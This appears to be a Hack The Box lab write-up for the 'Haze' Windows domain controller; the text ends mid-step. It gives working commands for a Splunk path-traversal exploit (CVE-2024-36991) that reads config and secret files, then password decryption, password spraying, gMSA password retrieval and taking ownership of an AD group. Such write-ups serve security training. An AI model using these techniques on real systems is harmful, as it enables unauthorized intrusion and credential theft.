HTB | Haze
Machine - https://app.hackthebox.com/machines/Haze
IP - 10.10.11.61
NMAP
└─$ nmap -sC -sV -p 53,88,135,139,445,464,593,636,3268,3269,5985,8000,8088,8089,47001,49664,49665,49666,49667,49668,57704,57708,57712,57756 10.10.11.61 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-21 10:26 IST
Nmap scan report for haze.htb (10.10.11.61)
Host is up (0.59s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-21 12:56:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://haze.htb:8000/en-US/account/login?return_to=%2Fen-US%2F
8088/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
8089/tcp open ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: splunkd
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
57704/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
57708/tcp open msrpc Microsoft Windows RPC
57712/tcp open msrpc Microsoft Windows RPC
57756/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-21T12:57:18
|_ start_date: N/A
|_clock-skew: 7h59m57s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.29 secondsPort 53
└─$ dig ANY haze.htb @10.10.11.61
; <<>> DiG 9.20.8-6-Debian <<>> ANY haze.htb @10.10.11.61
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30082
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;haze.htb. IN ANY
;; ANSWER SECTION:
haze.htb. 600 IN A 10.10.11.61
haze.htb. 3600 IN NS dc01.haze.htb.
haze.htb. 3600 IN SOA dc01.haze.htb. hostmaster.haze.htb. 113 900 600 86400 3600
;; ADDITIONAL SECTION:
dc01.haze.htb. 3600 IN A 10.10.11.61
;; Query time: 471 msec
;; SERVER: 10.10.11.61#53(10.10.11.61) (TCP)
;; WHEN: Sat Jun 21 10:15:11 IST 2025
;; MSG SIZE rcvd: 135Port 8000
└─$ whatweb -v -a 3 http://10.10.11.61:8000/
WhatWeb report for http://10.10.11.61:8000/
Status : 303 See Other
Title : 303 See Other
IP : 10.10.11.61
Country : RESERVED, ZZ
Summary : HTML5, HTTPServer[Splunkd], Meta-Refresh-Redirect[http://10.10.11.61:8000/en-US/], RedirectLocation[http://10.10.11.61:8000/en-US/], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]
Detected Plugins:
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Splunkd (from server string)
[ Meta-Refresh-Redirect ]
Meta refresh tag is a deprecated URL element that can be
used to optionally wait x seconds before reloading the
current page or loading a new page. More info:
https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh
String : http://10.10.11.61:8000/en-US/
[ RedirectLocation ]
HTTP Server string location. used with http-status 301 and
302
String : http://10.10.11.61:8000/en-US/ (from location)
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : x-content-type-options (from headers)
[ X-Frame-Options ]
This plugin retrieves the X-Frame-Options value from the
HTTP header. - More Info:
http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
aspx
String : SAMEORIGIN
HTTP Headers:
HTTP/1.1 303 See Other
Date: Sat, 21 Jun 2025 12:59:37 GMT
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Length: 335
Location: http://10.10.11.61:8000/en-US/
Vary: Accept-Language
Connection: Close
X-Frame-Options: SAMEORIGIN
Server: Splunkd
WhatWeb report for http://10.10.11.61:8000/en-US/
Status : 303 See Other
Title : <None>
IP : 10.10.11.61
Country : RESERVED, ZZ
Summary : Cookies[session_id_8000], HTTPServer[Splunkd], HttpOnly[session_id_8000], RedirectLocation[http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]
Detected Plugins:
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : session_id_8000
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Splunkd (from server string)
[ HttpOnly ]
If the HttpOnly flag is included in the HTTP set-cookie
response header and the browser supports it then the cookie
cannot be accessed through client side script - More Info:
http://en.wikipedia.org/wiki/HTTP_cookie
String : session_id_8000
[ RedirectLocation ]
HTTP Server string location. used with http-status 301 and
302
String : http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F (from location)
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : x-content-type-options (from headers)
[ X-Frame-Options ]
This plugin retrieves the X-Frame-Options value from the
HTTP header. - More Info:
http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
aspx
String : SAMEORIGIN
HTTP Headers:
HTTP/1.1 303 See Other
Date: Sat, 21 Jun 2025 12:59:39 GMT
Content-Type: text/html;charset=utf-8
X-Content-Type-Options: nosniff
Content-Length: 125
Content-Encoding: gzip
Vary: Accept-Encoding, Cookie
Connection: Close
X-Frame-Options: SAMEORIGIN
Location: http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
Set-Cookie: session_id_8000=006a3b11cccd0a0dc7b568b4b2a155621fcb01cc; expires=Sat, 21 Jun 2025 13:59:39 GMT; HttpOnly; Max-Age=3600; Path=/
Server: Splunkd
WhatWeb report for http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
Status : 200 OK
Title : <None>
IP : 10.10.11.61
Country : RESERVED, ZZ
Summary : Bootstrap, Cookies[cval,splunkweb_uid], HTML5, HTTPServer[Splunkd], Meta-Author[Splunk Inc.], Script[text/json], probably Splunk, UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]
Detected Plugins:
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : cval
String : splunkweb_uid
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Splunkd (from server string)
[ Meta-Author ]
This plugin retrieves the author name from the meta name
tag - info:
http://www.webmarketingnow.com/tips/meta-tags-uncovered.html
#author
String : Splunk Inc.
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/json
[ Splunk ]
Splunk indexes and makes searchable data from any app,
server or network device in real time including logs,
config files, messages, alerts, scripts and metrics.
Certainty : probably
Google Dorks: (1)
Website : http://www.splunk.com
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : x-content-type-options (from headers)
[ X-Frame-Options ]
This plugin retrieves the X-Frame-Options value from the
HTTP header. - More Info:
http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
aspx
String : SAMEORIGIN
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Sat, 21 Jun 2025 12:59:41 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Length: 4318
Content-Encoding: gzip
Vary: Accept-Encoding, Cookie
Connection: Close
Set-Cookie: cval=1829136398; Path=/en-US/account/
X-UA-Compatible: IE=edge
Set-Cookie: splunkweb_uid=E67A8998-46AC-43B4-B3E3-4BB25F187161; Path=/en-US/account; Max-Age=157680000; Expires=Thu, 20 Jun 2030 12:59:41 GMT
X-Frame-Options: SAMEORIGIN
Server: Splunkd
Looks like a Splunk server, Let’s visit the site
Foothold/shell
Shell as edward.martin
CVE-2024-36991
Looking for a known vulnerability for Splunk we found CVE-2024-36991
In Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10, an attacker could perform a path traversal on the /modules/messaging/ endpoint in Splunk Enterprise on Windows. This vulnerability should only affect Splunk Enterprise on Windows.
Let’s try to look for some files
http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
We found hashes for admin, edward, mark and paul
Let’s try to crack these via hashcat
it did not work
Let’s look for config files for Splunk (refer this)
└─$ curl http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../Splunk/etc/system/local/authentication.conf
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAPHere we found bindDNpassword for Paul
Auth as Paul.Taylor
According to this discussion, we can crack the password if we can have splunk.secret
A simple Google search tells us the path $SPLUNK_HOME/etc/auth/splunk.secret, and we can curl that
└─$ curl http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../Splunk/etc/auth/splunk.secret
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD found splunksecrets tool for working with Splunk secrets offline
└─$ splunksecrets splunk-decrypt --splunk-secret splunk.secret
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24And we now have Paul’s Cred
Let's see can we do smb or winrm via this
└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24'
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ netexec winrm 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24'
WINRM 10.10.11.61 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 DC01 [-] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
Since we can smb via paul’s cred, let’s enum shares and users
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --users
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.61 445 DC01 paul.taylor 2025-06-21 15:12:44 0
SMB 10.10.11.61 445 DC01 [*] Enumerated 1 local users: HAZE
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --shares
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 [*] Enumerated shares
SMB 10.10.11.61 445 DC01 Share Permissions Remark
SMB 10.10.11.61 445 DC01 ----- ----------- ------
SMB 10.10.11.61 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.61 445 DC01 C$ Default share
SMB 10.10.11.61 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.61 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.61 445 DC01 SYSVOL READ Logon server share
└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 500: HAZE\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 501: HAZE\Guest (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 512: HAZE\Domain Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 513: HAZE\Domain Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 514: HAZE\Domain Guests (SidTypeGroup)
SMB 10.10.11.61 445 DC01 515: HAZE\Domain Computers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 516: HAZE\Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 517: HAZE\Cert Publishers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 518: HAZE\Schema Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 519: HAZE\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.61 445 DC01 521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 525: HAZE\Protected Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 526: HAZE\Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1000: HAZE\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1101: HAZE\DnsAdmins (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1103: HAZE\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1112: HAZE\Support_Services (SidTypeGroup)
I will copy the sidtypeuser and print the names
└─$ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep -i 'user' | sed -E 's/.*HAZE\\([^ ]+).*/\1/' > username.txt
┌──(anurag㉿anurag)-[~/htb/Haze]
└─$ cat username.txt
Administrator
Guest
krbtgt
Domain
Protected
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
Let’s password spray the password of paul and see if someone is reusing it or not
└─$ netexec smb 10.10.11.61 -u username.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [-] haze.htb\Administrator:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.10.11.61 445 DC01 [-] haze.htb\Guest:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.10.11.61 445 DC01 [-] haze.htb\krbtgt:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.10.11.61 445 DC01 [-] haze.htb\Domain:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.10.11.61 445 DC01 [-] haze.htb\Protected:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.10.11.61 445 DC01 [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 [-] haze.htb\edward.martin:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.10.11.61 445 DC01 [-] haze.htb\alexander.green:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.10.11.61 445 DC01 [-] haze.htb\Haze-IT-Backup$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
mark.adams is also using paul’s password
Auth as Mark.adams
I can winrm via mark
─$ netexec winrm 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24'
WINRM 10.10.11.61 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)and we are in as Mark
Mark is a part of gMSA_Managers group
*Evil-WinRM* PS C:\Users\mark.adams> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ =========================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HAZE\gMSA_Managers Group S-1-5-21-323145914-28650650-2368316563-1107 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
*Evil-WinRM* PS C:\Users\mark.adams>
Bloodhound
Let’s use bloodhound-python
└─$ bloodhound-python -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d HAZE.htb -ns 10.10.11.61 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 52S
INFO: Compressing output into 20250621221004_bloodhound.zip
We can see MARK.ADMAS@HAZE.HTB -> MemberOf -> GMSA_MANAGERS@HAZE.HTB
A Group Managed Service Account (gMSA) is a special type of Active Directory (AD) account that administrators use to run automated services securely. Microsoft introduced it in Windows Server 2012 to solve the common problem of managing service account passwords. Unlike traditional service accounts, where administrators often set passwords manually and rarely update them, gMSAs allow Active Directory to manage passwords automatically. Reference: https://www.hackingarticles.in/readgmsapassword-attack/
GMSA_Managers
Currently, Mark does not have read permission
└─$ netexec ldap 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAP 10.10.11.61 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
LDAPS 10.10.11.61 636 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS 10.10.11.61 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.10.11.61 636 DC01 Account: Haze-IT-Backup$ NTLM: <no read permissions> PrincipalsAllowedToReadPassword: Domain Admins
We can check who has the permission to view the password
*Evil-WinRM* PS C:\Users\mark.adams\Documents> Get-ADServiceAccount -Identity "Haze-IT-Backup$" -Properties PrincipalsAllowedToRetrieveManagedPassword
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled : True
Name : Haze-IT-Backup
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Domain Admins,CN=Users,DC=haze,DC=htb}
SamAccountName : Haze-IT-Backup$
SID : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :Since Domain Admins can view the password, and Mark is not a domain admin, but mark is in the gMSA administrator group, so try to modify the readable user
*Evil-WinRM* PS C:\Users\mark.adams\Documents> Set-ADServiceAccount -Identity "Haze-IT-Backup$" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
*Evil-WinRM* PS C:\Users\mark.adams\Documents> Get-ADServiceAccount -Identity "Haze-IT-Backup$" -Properties PrincipalsAllowedToRetrieveManagedPassword
DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled : True
Name : Haze-IT-Backup
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Mark Adams,CN=Users,DC=haze,DC=htb}
SamAccountName : Haze-IT-Backup$
SID : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :
*Evil-WinRM* PS C:\Users\mark.adams\Documents>
Now we can retrieve the password of Haze-IT-Backup$
└─$ netexec ldap 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAP 10.10.11.61 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
LDAPS 10.10.11.61 636 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS 10.10.11.61 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.10.11.61 636 DC01 Account: Haze-IT-Backup$ NTLM: 4de830d1d58c14e241aff55f82ecdba1 PrincipalsAllowedToReadPassword: mark.adams
So the best practice is to try to update bloodhound content as soon as you get a user within the domain
Bloodhound via new hash
└─$ bloodhound-python -u 'Haze-IT-Backup$' --hashes :4de830d1d58c14e241aff55f82ecdba1 -d HAZE.htb -ns 10.10.11.61 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 9 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 01M 24S
INFO: Compressing output into 20250621225343_bloodhound.zip
We can see HAZE-IT-BACKUP@HAZE.HTB -> WriteOwner -> SUPPORT_SERVICES@HAZE.HTB -> ForceChangePassword/ AddKeyCedentialLink -> EDWARD.MARTIN@HAZE.HTB
WriteOwner
Set HAZE-IT-BACKUP@HAZE.HTB as group owner of SUPPORT_SERVICES@HAZE.HTB
└─$ bloodyAD --host 10.10.11.61 -d HAZE.htb -u 'Haze-IT-Backup$' -p ':4de830d1d58c14e241aff55f82ecdba1' set owner SUPPORT_SERVICES Haze-IT-Backup$
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES
No we need to add HAZE-IT-BACKUP@HAZE.HTB to SUPPORT_SERVICES@HAZE.HTB, but before that, we need to add all permissions to ourselves
